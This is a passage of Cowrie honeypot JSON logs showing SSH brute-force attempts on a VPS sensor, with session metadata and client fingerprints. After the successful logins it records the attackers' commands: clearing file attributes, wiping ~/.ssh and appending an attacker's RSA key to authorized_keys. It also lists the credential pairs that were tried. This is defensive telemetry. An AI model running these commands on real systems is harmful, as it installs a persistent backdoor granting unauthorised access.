com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:25:48.994086Z","src_ip":"212.227.235.229","session":"b3b73bc3953d"}
{"eventid":"cowrie.login.failed","username":"web-user","password":"web-user","message":"login attempt [web-user/web-user] failed","sensor":"my-vps","timestamp":"2025-08-31T06:25:49.966776Z","src_ip":"212.227.235.229","session":"b3b73bc3953d"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:25:51.202225Z","src_ip":"212.227.235.229","session":"b3b73bc3953d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:25:54.425267Z","src_ip":"212.227.235.229","session":"97e1475a5eba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:25:54.426555Z","src_ip":"212.227.235.229","session":"97e1475a5eba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49798,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1068c4a76da","protocol":"ssh","message":"New connection: 212.227.125.160:49798 (1.2.3.4:22) [session: b1068c4a76da]","sensor":"my-vps","timestamp":"2025-08-31T06:25:56.449402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:25:57.042035Z","src_ip":"212.227.125.160","session":"b1068c4a76da"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:25:57.042928Z","src_ip":"212.227.125.160","session":"b1068c4a76da"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"password","message":"login attempt [tomcat/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:25:59.018299Z","src_ip":"212.227.125.160","session":"b1068c4a76da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50722,"dst_ip":"1.2.3.4","dst_port":22,"session":"31bd87a8aff6","protocol":"ssh","message":"New connection: 212.227.235.229:50722 (1.2.3.4:22) [session: 31bd87a8aff6]","sensor":"my-vps","timestamp":"2025-08-31T06:26:00.301982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:26:00.303158Z","src_ip":"212.227.235.229","session":"31bd87a8aff6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55216,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0b6ef505f6e","protocol":"ssh","message":"New connection: 212.227.125.160:55216 (1.2.3.4:22) [session: c0b6ef505f6e]","sensor":"my-vps","timestamp":"2025-08-31T06:26:00.381074Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:26:00.561318Z","src_ip":"212.227.235.229","session":"31bd87a8aff6"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:00.597995Z","src_ip":"212.227.125.160","session":"b1068c4a76da"}
{"eventid":"cowrie.login.success","username":"root","password":"asdf@123","message":"login attempt [root/asdf@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:26:01.631180Z","src_ip":"212.227.235.229","session":"31bd87a8aff6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:26:02.168031Z","src_ip":"212.227.235.229","session":"31bd87a8aff6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:26:02.169010Z","src_ip":"212.227.235.229","session":"31bd87a8aff6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:26:02.170182Z","src_ip":"212.227.235.229","session":"31bd87a8aff6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:02.432520Z","src_ip":"212.227.235.229","session":"31bd87a8aff6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:26:03.014209Z","src_ip":"212.227.235.229","session":"31bd87a8aff6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:26:03.015292Z","src_ip":"212.227.235.229","session":"31bd87a8aff6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:26:03.277591Z","src_ip":"212.227.235.229","session":"31bd87a8aff6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:03.278867Z","src_ip":"212.227.235.229","session":"31bd87a8aff6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51734,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e8180494764","protocol":"ssh","message":"New connection: 212.227.235.229:51734 (1.2.3.4:22) [session: 5e8180494764]","sensor":"my-vps","timestamp":"2025-08-31T06:26:03.532662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:26:03.537004Z","src_ip":"212.227.235.229","session":"5e8180494764"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:26:03.794079Z","src_ip":"212.227.235.229","session":"5e8180494764"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:26:04.819918Z","src_ip":"212.227.235.229","session":"5e8180494764"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:06.082638Z","src_ip":"212.227.235.229","session":"5e8180494764"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52760,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b61bc8fc3c3","protocol":"ssh","message":"New connection: 212.227.235.229:52760 (1.2.3.4:22) [session: 9b61bc8fc3c3]","sensor":"my-vps","timestamp":"2025-08-31T06:26:06.338033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:26:06.339367Z","src_ip":"212.227.235.229","session":"9b61bc8fc3c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:26:06.598034Z","src_ip":"212.227.235.229","session":"9b61bc8fc3c3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:26:07.665515Z","src_ip":"212.227.235.229","session":"9b61bc8fc3c3"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:07.923662Z","src_ip":"212.227.235.229","session":"31bd87a8aff6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:07.924984Z","src_ip":"212.227.235.229","session":"9b61bc8fc3c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35258,"dst_ip":"1.2.3.4","dst_port":23,"session":"6c3e05c05885","protocol":"telnet","message":"New connection: 212.227.235.229:35258 (1.2.3.4:23) [session: 6c3e05c05885]","sensor":"my-vps","timestamp":"2025-08-31T06:26:23.709216Z"}
{"eventid":"cowrie.session.closed","duration":"23.8","message":"Connection lost after 23.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:24.205889Z","src_ip":"212.227.125.160","session":"c0b6ef505f6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46164,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0ef8ace46a2","protocol":"ssh","message":"New connection: 212.227.235.229:46164 (1.2.3.4:22) [session: d0ef8ace46a2]","sensor":"my-vps","timestamp":"2025-08-31T06:26:29.909997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:26:29.911044Z","src_ip":"212.227.235.229","session":"d0ef8ace46a2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:26:30.188421Z","src_ip":"212.227.235.229","session":"d0ef8ace46a2"}
{"eventid":"cowrie.login.success","username":"root","password":"123!@#123","message":"login attempt [root/123!@#123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:26:31.341332Z","src_ip":"212.227.235.229","session":"d0ef8ace46a2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:26:31.917617Z","src_ip":"212.227.235.229","session":"d0ef8ace46a2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:26:31.918740Z","src_ip":"212.227.235.229","session":"d0ef8ace46a2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:26:31.920506Z","src_ip":"212.227.235.229","session":"d0ef8ace46a2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:32.198922Z","src_ip":"212.227.235.229","session":"d0ef8ace46a2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:26:33.311361Z","src_ip":"212.227.235.229","session":"d0ef8ace46a2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:26:33.312172Z","src_ip":"212.227.235.229","session":"d0ef8ace46a2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:26:33.590292Z","src_ip":"212.227.235.229","session":"d0ef8ace46a2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:26:33.591352Z","src_ip":"212.227.235.229","session":"d0ef8ace46a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47414,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ed1a683cc07","protocol":"ssh","message":"New connection: 212.227.235.229:47414 (1.2.3.4:22) [session: 2ed1a683cc07]","sensor":"my-vps","timestamp":"2025-08-31T06:26:33.937890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:26:33.938731Z","src_ip":"212.227.235.229","session":"2ed1a683cc07"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:26:34.261190Z","src_ip":"212.227.235.229","session":"2ed1a683cc07"}
